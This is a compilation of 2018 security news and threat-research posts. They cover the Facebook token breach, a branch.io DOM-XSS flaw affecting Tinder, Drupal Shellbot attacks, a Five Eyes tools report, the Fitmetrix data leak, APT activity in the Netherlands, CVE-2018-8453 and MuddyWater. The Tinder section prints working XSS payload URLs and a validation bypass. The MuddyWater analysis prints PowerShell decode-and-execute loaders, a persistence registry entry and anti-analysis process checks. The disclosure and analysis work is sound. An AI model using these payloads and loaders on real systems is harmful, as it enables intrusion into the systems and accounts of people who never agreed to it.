“First, the attackers already controlled a set of accounts, which were connected to Facebook friends. They used an automated technique to move from account to account so they could steal the access tokens of those friends, and for friends of those friends, and so on, totaling about 400,000 people.” Rosen added.

“In the process, however, this technique automatically loaded those accounts’ Facebook profiles, mirroring what these 400,000 people would have seen when looking at their own profiles. That includes posts on their timelines, their lists of friends, Groups they are members of, and the names of recent Messenger conversations. Message content was not available to the attackers, with one exception. If a person in this group was a Page admin whose Page had received a message from someone on Facebook, the content of that message was available to the attackers.”

Facebook is cooperating with the US authorities, the Irish Data Protection Commission and other authorities regarding the breach.

Rosen confirmed Facebook had “no reason to believe this attack was related to the mid-term elections” in the US.


DOM-XSS Bug Affecting Tinder, Shopify, Yelp, and More
13.1.0218 securityaffairs 
Vulnerebility

Our team of security researchers was researching dating apps client-side security, and one of the main focus targets was the social search mobile app Tinder.
After initial reconnaissance steps were done, a Tinder domain with multiple client-side security issues was found – meaning hackers could have access to users’ profiles and details.

Immediately after finding these vulnerabilities, we contacted Tinder via their responsible disclosure program and started working with them.

We learned that the vulnerable endpoint isn’t owned by Tinder, but by branch.io, an attribution platform used by many big corporations around the globe. The Tinder security team helped us get in touch with them, and accordingly, they’ve put out a timely patch.

Digging deeper, we found out many big websites were sharing the vulnerable endpoint in their code and domains, including Shopify, Yelp, Western Union, and Imgur. This means that as many as 685 million users could be at risk.

While the flaw has already been fixed, if you have recently used Tinder or any of the other affected sites, we recommend checking to make sure your account hasn’t been compromised. It’s a good idea to change your password ASAP.

Details:
DOM-based XSS vulnerability, also known as “type-0 XSS” is a class of cross-site scripting vulnerability that appears within the DOM. It is a type of attack wherein the attack payload is executed as a result of modifying the DOM environment in the victim’s browser, more so in a dynamic environment. In DOM-based XSS, the HTML source code and response of the attack will be exactly the same. This means the malicious payload cannot be found in the response, making it extremely difficult for browser-built in XSS mitigation features like Chrome’s XSS Auditor to perform.

Can you spot the vulnerabilities?

Tinder

The fact that branch.io wasn’t using CSP made these vulnerabilities easy to exploit in any browser we like.

1. DOM XSS
For example, our initial finding was the endpoint https://go.tinder.com/amp-iframe-redirect was prone to multiple vulnerabilities (scheme_redirect & redirect_strategy GET parameters control the div content).

redirect_strategy is “INJECTIONA” and scheme_redirect is “INJECTIONB” from the code above.

This meant that by modifying redirect_strategy to a dom-xss payload, it was possible to execute client-side code in the context of a Tinder domain in any browser:
https://go.tinder.com/amp-iframe-redirect?scheme_redirect=http://google.com&redirect_strategy=1)%7B%0Aalert(1)%3B//
will render in the DOM as:

if (1){ alert(1);// && “INJECTIONA”) {

var parser = document.createElement(‘a’);

parser.href = “INJECTIONA”;

var protocol = parser.protocol.toLowerCase();

Tinder

2. validateProtocol() and validate() Bypass
Also notice how validateProtocol() uses indexOf to check the schemes – the indexOf() method returns the position of the first occurrence of a specified value in a string. This method returns -1 if the value to search for never occurs. However, it can be tricked by using javascript://%0aalert(0)//good.com/https:// — both the validate functions can be bypassed because indexOf will find “https://“

var parser = document.createElement(‘a’);

parser.href = url;

var protocol = parser.protocol.toLowerCase();

if ((‘javascript:’, ‘vbscript:’, ‘data:’).indexOf(protocol) < 0) {

return url;

}

….

return null;

if ([‘http:’, ‘https:’].indexOf(protocol) < 0) {

window.top.location = validate(“http://google.com”);

}

So, how did this bug affect more than Tinder?
go.tinder.com is an alias for custom.bnc.lt, a Branch.io resource. And many other companies have their alias pointing to it.

To name a few websites affected by this vulnerability: RobinHood, Shopify, Canva, Yelp, Western Union, Letgo, Cuvva, imgur, Lookout, fair.com and more.

Thanks to the fast response we got from Branch’s security team, this vulnerability has now been fixed for everyone’s domains.


Hackers targeting Drupal vulnerabilities to install the Shellbot Backdoor
13.1.0218 securityaffairs 
Vulnerebility  Virus

A group of hackers is targeting Drupal vulnerabilities, including Drupalgeddon2, patched earlier this year to install a backdoor on compromised servers.
Security experts from IBM are targeting Drupal vulnerabilities, including the CVE-2018-7600 and CVE-2018-7602 flaws, aka Drupalgeddon2 and Drupalgeddon3, to install a backdoor on the infected systems and tack full control of the hosted platforms.

According to the IBM experts, this last wave of attacks is conducted by hackers financially motivated and attempt to exploit the lack of patch management in many Drupal websites.

“In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.” states the post published by IBM.

“This appears to be a financially motivated effort to mass-compromise websites.”

The expert observed a large number of HTTP POST requests being sent by the same IP address as part of a widespread cyber-attack. The requests were used by the attackers to download a Perl script to launch the Shellbot backdoor that leverages an Internet Relay Chat (IRC) channel as C&C.

Drupal attacks

The bot included multiple tools to carry out distributed denial-of-service (DDoS) attacks and scan for SQL injection weaknesses and other vulnerabilities, including privilege escalation issues.

The bot was designed to automate scanning a large number of websites and fully compromise the vulnerable ones.

Experts pointed out that the Shellbot code first appeared in 2005 and is being used by several threat groups, it was also used in the massive crypto-mining campaign that was exploiting the CVE-2017-5638 Apache Struts vulnerability (CVE-2017-5638) in March 2017.

“It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications,” IBM concludes.


Five Eyes Intelligence agencies warn of popular hacking tools
13.1.0218 securityaffairs 
BigBrothers

Security agencies belonging to Five Eyes (United States, United Kingdom, Canada, Australia and New Zealand) have released a joint report that details some popular hacking tools.
Experts from cybersecurity agencies from Five Eyes intelligence alliance have issued a report that provides technical details on most popular hacking tool families and the way to detect and neutralizes attacks involving them.

The report was realized with the contribute of the researchers from the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

“This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5]” reads the report published by the experts.

“In it we highlight the use of five publicly available tools, which have been used for malicious purposes in recent cyber incidents around the world. The five tools are:

Remote Access Trojan: JBiFrost
Webshell: China Chopper
Credential Stealer: Mimikatz
Lateral Movement Framework: PowerShell Empire
C2 Obfuscation and Exfiltration: HUC Packet Transmitter
To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.”

The report provides technical details on remote access trojans (RATs), web shells, credential stealers, lateral movement frameworks, and command and control (C&C) obfuscators.

The experts analyzed the JBiFrost RAT, that is a variant of Adwind backdoor, that was used by almost any kind of attackers from nation-state hackers to low-skilled crooks.

“JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors.

Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors.” states the report.

“JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X, and Android.”

The report also describes the popular post–exploitation tool Mimikatz that was used by many threat actors and the lateral movement framework PowerShell Empire, this latter is used by attackers to elevate privileges, harvest credentials, find nearby hosts, and move laterally across the target network.

The experts at Five Eyes agencies also detailed the China Chopper web shell, a code injection web shell that executes Microsoft .NET code within HTTP POST commands.

The China Chopper is a tiny shell (4K) widely used in attacks in the wild since 2012, early this year the China-linked APT group Leviathan. aka TEMP.Periscope, used it in attacks on engineering and maritime entities over the past months.

Another hacking tool described in the report is HUC Packet Transmitter (HTran), that could be exploited by attackers to obfuscate communications with the intent bypass security controls and evade detection.

“The individual tools we cover in this report are limited examples of the types of tools used by threat actors. You should not consider this an exhaustive list when planning your network defense.” states the report.

“Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the dark web. Today, malicious tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organized criminals, to amateur cyber criminals.

The tools in this Activity Alert have been used to compromise information across a wide range of critical sectors, including health, finance, government, and defense. Their widespread availability presents a challenge for network defense and threat-actor attribution.”


Fitmetrix fitness software company may have exposed millions of customer records
13.1.0218 securityaffairs 
Incindent

Fitmetrix fitness software company exposed customer data online, a 119GB archive containing name, gender, email address, birth date, height, weight and more
A fitness software company Fitmetrix may have exposed a database hosted on AWS containing millions of customer records. The exposed records included name, gender, email address, birth date, home and work phone, height, weight and much more.

The huge trove of data was discovered by the expert Bob Diachenko using a simple Shodan query for unsecured Elasticsearch installs.

Fitmetrix

The expert discovered an archive of 119GB exposed by Fitmetrix on a cloud storage, the noticed two sets of data one of with was labeled as “compromised” that contained a ransom note.

“On October 5th, a member of Hacken security team has been browsing through Shodan looking for exposed Elasticsearch instances which recently could become targets in another spread of ransomware campaigns.” reads a blog post published by Diachenko.

“It appears that the attackers are using a script that automates the process of accessing a database, possibly exporting it, deleting the database, and then creating the ransom note. This script sometimes fails and the data is still available to the user even though a ransom note is created.”

The database includes daily FitMetrix platform audit data in the period between July 15th and Sept 19th 2018. The total number of records in ‘platformaudit’ indexes was 122,869,970, not all containing customer data.

Diachenko estimated that “millions” other accounts were still likely to have been affected.

Mindbody, who owns FitMetrix, secured the database five days after he was informed of the data leak, on October 10.


Threats in the Netherlands

13.1.0218 Kaspersky APT
Advanced threat actors and other malicious cyber activity
Introduction
On October 4, 2018, the MIVD held a press conference about an intercepted cyberattack on the OPWC in the Netherlands, allegedly by the advanced threat actor Sofacy (also known as APT28 or Fancy Bear, among others). According to the MIVD, four suspects were caught red handed trying to break into the OPWC’s network. Sofacy activity in the Netherlands did not come as a surprise to us, since we have seen signs of its presence in that country before. However, aside from Sofacy we haven’t seen many other advanced persistent threat (APT) groups in the Netherlands, at least when compared to other areas, such as the Middle-East. Upon further reflection, we have concluded that this is rather odd. There are quite a few big multinationals and some high tech companies located in the Netherlands. In addition, there are other potential strategic targets for threat actors. So we decided to review cyber-threat activity targeting or affecting the Netherlands.

Providing an overview of one APT’s activity can be quite difficult, let alone all the APT activity affecting a country. First, we only see what we can see. That means we can only gather data from sources we have access to, such as that shared voluntarily by our customers with Kaspersky Security Network (KSN), and those sources also need to be supplied with data related to a specific APT. As a result, like any other cybersecurity vendor, our telemetry is naturally incomplete.

One way to improve our overview is to use sinkhole data. When a domain that is used by an APT expires, researchers can register that domain and direct the traffic to a sinkhole server. This is done quite frequently. For many of the APTs we track, we sinkhole at least one domain. In comparison to other sources, such as KSN and multi-scanner services, sinkhole data has a number of advantages. For example, in some cases you can get a better overview of the victimology of the APT. The drawback is that we need to filter the results, since there can be quite a few false positives (e.g. because other researchers are investigating the malware). This filtering can be quite cumbersome, because if we base it solely on the IP and the requests, it is quite difficult to come to a verdict.

Methodology
For this blogpost we gathered all the sinkhole data for Dutch IPs in the last four years (September 2014 to September 2018), which amounts to around 85,000 entries. Of course, this is far too much to verify by hand, so the first step was to filter the results, and especially all the scanners. While some of these were relatively easy to spot and filter out (e.g. all the TOR exit nodes, all the Romanian.anti-sec), others required a bit more effort.

In order to filter out the scanners, we deleted all entries where the IP matched more than four “tags” (each tag stands for a different campaign). After doing this, we were left with around 11,000. That meant 77% fewer results, but there were still too many, so we applied some more aggressive filtering.

The table below describes the number of tags that were hit per IP.

0 10,532
1 1,149
2 618
3 344
4 234
>4 938
One way to determine whether a hit in the sinkhole database is a true positive (TP) or a false positive (FP), is to find out who the victim is. We thus reversed the IP and checked whether, at the time of the first entry in our sinkhole database, the DNS entry matched the entries in our passive DNS database. If this was not the case, the entry was ignored. The next step was to remove all the entries that would be difficult to investigate (e.g. IP addresses that belong to an ADSL connection). Even though this method was quite rigid and meant that some TPs might be missed, we still decided to use it, since we knew it would be too resource-intensive to investigate all the entries. The result: only around 1,000 entries remained for investigation.

The aim of this blogpost is to give an overview of which APT groups are active in the Netherlands and what they are interested in, and that requires TPs, not FPs. For each remaining entry, a reverse DNS lookup was made, and the ASN information was saved. This was checked against our passive DNS database to see whether this IP had the same domain as its first entry in the sinkhole database. If it did, the entry was kept, if it was not, we tried to find out to which organization the IP belonged.

At this point, for the entries that remained, the raw requests were retrieved against the template request made by the APT. Finally, for each of the IPs left on our list, we tried to tie them to a company or institution. If this was the case, the entry was kept and marked as a TP.

We also checked our APT reports for targets in the Netherlands and added these results to the review.

Results
Using the methods described above, we found the following APTs that are or have been active in the Netherlands:

BlackOasis
BlackOasis is an APT group we have been tracking since May 2016. It uses the commercially available FinFisher malware made by Gamma International and sold to law enforcement agencies (LEAs) and nation states. BlackOasis differentiates itself from other APT-groups by using a vast amount of 0-days: at least five since 2015. Victims are mostly found in Middle Eastern countries, where the group is particularly interested in politics. We have also seen it targeting members of the United Nations and regional news correspondents. Recently we have seen a shift in focus towards other countries such as Russia, the UK and now also the Netherlands. Its Dutch victims fit into its shift of interest.

Sofacy
Sofacy, also known as Pawn Storm, Fancy Bear and many other names is an active APT group that we have followed since 2011. It is known for using spear phishing emails to infect targets and for the active deployment of 0-days. In 2015, Trend Micro researchers reported that the group had targeted the MH17 investigation team. Last year, the Volkskrant published an article alleging it tried to infect several Dutch Ministries. Then there is the October 4, 2018 news of four alleged Sofacy members having been caught in April 2018 trying to hack the OPWC. Even though we cannot confirm these last two incidents, since we are not involved, we have observed several targets in the Netherlands infected with Sofacy. Interestingly, we observe fewer deployments of Xagent (one of Sofacy’s modules) after April 2018. Although one new Xagent deployment was noted in August 2018, it seems that the group pushed fewer, and then only new, deployments from April through June 2018.

Hades
Hades is the name given to the group held responsible for the Olympic Destroyer malware that was found targeting the 2018 Winter Olympic Games in South Korea. Our initial thought was that the malware was related to the Lazarus group, because several of our Yara rules had 100% matches with the malware. However, after careful research we found many false flags that pointed to different APT groups. A few months later, in May 2018 (not long after the OPWC incident took place), we found that Hades had returned and was now targeting financial institutions and chemical threat prevention laboratories. Given this shift of interest, it is no surprise that entities in the Netherlands were targeted as well.

Buhtrap
Buhtrap is one of the groups that targets financial institutions with the ultimate goal of stealing money. Its tools, techniques and processes (TTPs) don’t differ extensively from those of traditional APT groups. Buhtrap is one of those (Carbanak and Tyupkin are others) that started by infecting financial institutions in Russia and Ukraine, but after a while shifted its focus to other parts of the world. We found Buhtrap activity in the Netherlands in 2017.

The Lamberts
In March 2017, WikiLeaks published online a series of documents that they call “Vault 7”. Some of these documents feature malware that resembles that used by the Lamberts, a toolkit that has been used for several years, with most of its activity occurring in 2013 and 2014. One of The Lamberts’ variants we have been investigating is the “Green Lamberts”. We were surprised to see quite a few infections in the Netherlands, when the majority of attacks target Iran. We do not have any insight into the profile of the victims located in the Netherlands. Nevertheless, the fact that Lamberts is active in the Netherlands shows a possible shift in focus, and reminds us that for APT groups, borders do not exist.

Turla
Turla, also known as Uroboros, is a very active APT group, believed to be connected to many high-profile incidents such as the US Central Command attack in 2008 and the breach of RUAG (a Swiss military contractor). Other Turla targets include ministries and governmental organizations. Given all this, the Netherlands is a logical target for the Turla group. In fact, we would have been surprised not to have found any Turla infections in the Netherlands.

Gatak
Gatak, which also goes by the names of Stegoloader and GOLD, is a group that engages in data theft using watering hole attacks. It has been active since at least 2015, and its main interest is in intellectual property. Even though the use of watering hole attacks means the group does not have full control over who it infects, it has been able to hit a couple of high profile targets. In this case, our sinkhole database enabled us to determine that one of those was a high profile target in the Netherlands.

Putter Panda
In 2015, the Dutch chip maker, ASML was allegedly breached by Putter Panda. ASML acknowledged the breach and stated that one file was stolen. No further details are publicly available, although there was an episode of the TV program “KRO reporter“, partially dedicated to the breach. ASML is one of relatively few high-tech companies in the Netherlands. The fact that it has been breached is a clear sign that foreign threat actors are aware of and interested in industrial espionage in the Netherlands.

Animal Farm
Animal Farm is a group that has been active since at least 2009. A relatively advanced threat actor, it has been targeting a variety of organizations over the past years. Victims include governmental organizations, military contractors, activists and journalists. Even though the group is mainly focused on French speaking countries, we still found a few infections in the Netherlands.

Conclusion
Although our visibility of threat actor activity in the Netherlands is incomplete, the results are nevertheless surprising. Some groups we did not expect to see appear to be active in the country (such as the Lamberts). However, upon further thought, and especially when looking at potential targets located in the Netherlands and comparing this with the interests of some of the APT groups, their activity in the Netherlands makes sense.

The presence of both expected and unexpected threat actors is a good argument for organizations staying informed of the latest developments in cyberspace, particularly through threat intelligence reports. Because if you know what APT groups are up to, which organisations they target and what TTPs they use, you can implement the protection you need to stay one step ahead of them.

Such precautions are important, because one of the most stunning findings from the review of sinkhole databases was the number of organizations infected using “ordinary cybercrime malware”. We saw infections among airlines, airports and other major companies (although it should be noted that this happens in other countries as well, not just in the Netherlands). It demonstrates again that it is not so difficult for (APT) groups to breach valuable targets and that basic cyber hygiene is important for everybody.

As a final note, one should always be careful about deriving hard conclusions from APT findings, particularly in terms of attribution. For example, even though we saw Olympic Destroyer malware being used to target chemical threat prevention laboratories shortly after the OPWC incident, this is not conclusive evidence that the groups behind these attacks are the same, or even related. However, using this fact to monitor your network for the presence of Olympic Destroyer malware if you think you might be a potential Sofacy target – and vice versa – seems like a good approach.


Zero-day exploit (CVE-2018-8453) used in targeted attacks
13.1.0218 Kaspersky
Exploit  Vulnerebility

Yesterday, Microsoft published their security bulletin, which patches CVE-2018-8453, among others. It is a vulnerability in win32k.sys discovered by Kaspersky Lab in August. We reported this vulnerability to Microsoft on August 17, 2018. Microsoft confirmed the vulnerability and designated it CVE-2018-8453.

In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.

So far, we detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.

Kaspersky Lab products detected this exploit proactively through the following technologies:

Behavioral detection engine and Automatic Exploit Prevention for endpoints
Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)
Kaspersky Lab Verdicts for the artifacts in this campaign are:

HEUR:Exploit.Win32.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic
More information about this attack is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Technical details
CVE-2018-8453 is a Use-After-Free inside win32kfull!xxxDestroyWindow that resembles an older vulnerability — CVE-2017-0263. CVE-2017-0263 was originally deployed by the Sofacy APT, together with a PostScript exploit, back in 2017.

For technical analysis of the vulnerability, we completely reverse-engineered the ITW exploit sample obtained and rewrote it into a full Proof of Concept.

The exploitation of this vulnerability depends on a sequence of events that are performed from hooks set on three usermode callback functions – fnDWORD, fnNCDESTROY, and fnINLPCREATESTRUCT. The exploit installs these hooks by replacing the function pointers in the KernelCallbackTable:

Hooked functions in the Kernel Callback Table

Inside the fnINLPCREATESTRUCT hook, the exploit initializes a “SysShadow” window by explicitly assigning a position to it:

Usermode hook on fnINLPCREATESTRUCT initializes SysShadow

When processing the WM_LBUTTONDOWN message, the fnDWORD hook executes the DestroyWindow function on the parent, which results in the window being marked as free and subsequently freed by the garbage collector.

The issue lies inside the fnNCDESTROY hook that is performed during execution of the DestroyWindow function. This hook executes the NtUserSetWindowFNID syscall, which contains a flawed logic to change the fnid status of the window without properly checking if it is set to FNID_FREED.

Vulnerable code inside NtUserSetWindowFNID

The fnid status of the window is located at offset 0x02a in the tagWND structure:

kd> dt win32k!tagWND

+0x02a fnid : Uint2B

When the scrollbar is initially created, it has the value FNID_SCROLLBAR (0x029A).

The next diagram shows the value of fnid prior and after execution of the NtUserSetWindowFNID syscall:

Scrollbar fnid prior and after execution of NtUserSetWindowFNID syscall

We can check what the new fnid value is by verifying it against the ReactOS source code:

/* FNIDs for NtUserSetWindowFNID, NtUserMessageCall */
#define FNID_SCROLLBAR 0x029A

#define FNID_BUTTON 0x02A1

#define FNID_FREED 0x8000 /* Window being Freed… */

This action results in the first scrollbar being destroyed, while the system still maintains a reference to a “SysShadow” class, as the scrollbar fnid is no longer marked as FNID_FREED, but as FNID_BUTTON instead.

To successfully reclaim the freed memory pool, the exploit contains a number of different feng shui tactics. The spray procedure is dependent on the exploited Windows version, and because the exploit targets a wide range of operating systems, it includes five separate functions for spraying:

Heap spraying procedures supported in the exploit

For the latest supported version (Windows 10 RS4), the spray tactic is quite complicated. The kernel is sprayed with bitmap objects of different size. This is required to exhaust the memory allocator to eventually bypass the Low Fragmentation Heap security mitigations that were significantly improved in the latest Windows builds:

Heap Feng Shui technique for Windows RS4 17134

This leads to the following memory layout, where USERTAG_SCROLLTRACK is the freed pool allocation:

Freed scrollbar heap allocation

When another scrollbar is allocated, the SysShadow class memory reference is reused, but its contents are attacker-controlled, because the freed Usst (ffffee30044b2a10) and Gpbm (ffffee30044b2a90) pools were merged into a single block:

Freed allocation is merged with the following pool

This results in a powerful arbitrary kernel Read\Write using GDI Bitmap primitives that works even on the latest Windows versions.

Following successful exploitation, a slightly modified Token-stealing payload is used to swap the current process Token value with the one from the SYSTEM EPROCESS structure:

Modified Token-stealing payload process

So far, we’ve observed the usage of this exploit in a small number of targeted attacks, when the exploit is packaged in a malware installer. The installer requires system privileges to install its payload. The payload is a sophisticated implant, used by the attackers for persistent access to the victims’ machines. Some of its main characteristics include:

Encrypting the main payload using AES-256-CBC with the SHA-1 of the SMBIOS UUID (this makes it impossible to decrypt the payload on machines other than the victim, if the SMBIOS UUID is not known)
Using Microsoft BITS (Background Intelligent Transfer Service) for communicating with its C&C servers, an unusual technique
Storing the main payload in a randomly named file on disk; the loader contains a hash of the filename and attempts to find the payload by comparing the filename hash for all files in the Windows directory
More details on this malware and the APT behind it are available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Victims
The distribution of the attack seems to be highly targeted, affecting less than a dozen victims in the Middle East region, according to our telemetry.

Attribution
During our investigation, we discovered the attackers were using a PowerShell backdoor that has previously been seen exclusively used by the FruityArmor APT. There is also an overlap in the domains used for C2 between this new set of activity and previous FruityArmor campaigns. That makes us assess with medium confidence that FruityArmor is responsible for the attacks leveraging CVE-2018-8453.

Conclusion
Even when deploying 0-days seems to be more frequent than it used to be, this would be the second time we have spotted FruityArmor using one of them to distribute its malware. This points to the resources and sophistication of this actor, along with the advanced final-stager they distribute.

So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.

We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar.

Appendix I – Indicators of compromise:
Domains:
weekendstrips[.]net
shelves-design[.]com


MuddyWater expands operations

13.1.0218 Kaspersky APT

Summary
MuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi Arabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large amount of spear phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia, other victims were also detected in Mali, Austria, Russia, Iran and Bahrain.. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.

The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Previous related research:
https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html?m=1
https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/
https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/
https://www.sekoia.fr/blog/falling-on-muddywater/

Decoy images by country
Jordan

The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc
Turkey

Turkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety

Turkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc)
Saudi Arabia

 

Document signed by the Major General Pilot, commander of the Saudi Royal Air Force

KSA King Saud University (KSU) KSA King Saud University (KSU)
Azerbaijan

İnkiºaf üçün görüº.doc (meeting for development)

Iraq

Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers
Pakistan

ECP.doc National Assembly of Pakistan.doc

P.Police.doc
Afghanistan

President.doc, E-government of Afghanistan

Technical details
Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.

The initial infection vector
The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.

Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box.

The macro payload analysis, dropped files and registry keys
The macro payload, which is Base64 encoded, does the following:

Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the “ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.
\EventManager.dll
\EventManager.logs
\WindowsDefenderService.inil

Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.
Name:WindowsDefenderUpdater
Type:REG_EXPAND_SZ
Data:c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,

The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.

Case 1: INF, SCT and text files dropped by the macro
INF is launched via the advpack.dll “LaunchINFSection” function.
INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).
Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file.
powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join(”,$d));

PowerShell one-liner

Encoded text file

Execution flow:

Case 2: VBS and text files dropped by the macro
The VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).

powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

PowerShell one-liner

Encoded text file

Execution flow:

The PowerShell code
When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation.

The first thing the PowerShell code does is to disable office “Macro Warnings” and “Protected View“. This is to ensure future attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks.

Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers.

“win32_remote“,”win64_remote64“,”ollydbg“,”ProcessHacker“,”tcpview“,”autoruns“,”autorunsc“,”filemon“,”procmon“,”regmon“,”procexp“,”idaq“,”idaq64“,”ImmunityDebugger“,”Wireshark“,
”dumpcap“,”HookExplorer“,”ImportREC“,”PETools“,”LordPE“,”dumpcap“,”SysInspector“,”proc_analyzer“,”sysAnalyzer“,”sniff_hit“,”windbg“,”joeboxcontrol“,”joeboxserver“

Blacklisted process names in the malware

In some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it causes a BSOD via the ntdll.dll “NtRaiseHardError” function.

CnC communication
A URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected URL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it tries to obtain another random URL from $middle_dragon, then sleeps from one to 30 seconds and loops again.

Victim system reconnaissance
The code then tries to obtain the victim’s public IP via “https://api.ipify.org/”.

The public IP is then POSTed along with OS Version, Internal IP, Machine Name, Domain Name, UserName after being encrypted to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims depending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC, the victim is assigned an ID $sysid. This ID is sent to the CnC with each request for commands to execute.

Supported commands
“upload“, “screenshot“, “Excel“, “Outlook“, “risk“, “reboot“, “shutdown“, “clean“. These commands vary from one version to another.

The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“.
The “Excel” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Excel to execute this PowerShell script via DDE.
The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Outlook via COM, via MSHTA.exe, to execute it.
The “risk” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Explorer.exe via COM interaction to execute it.
The “upload” command downloads files from the CnC and saves them locally in “C:\ProgramData“.
The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.
The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.
In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper“, “Panda“, or “ESET“.

Victimology

Most victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other victims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks suggest they are geopolitically motivated, targeting sensitive personnel and organizations.

Attacker deception and attribution
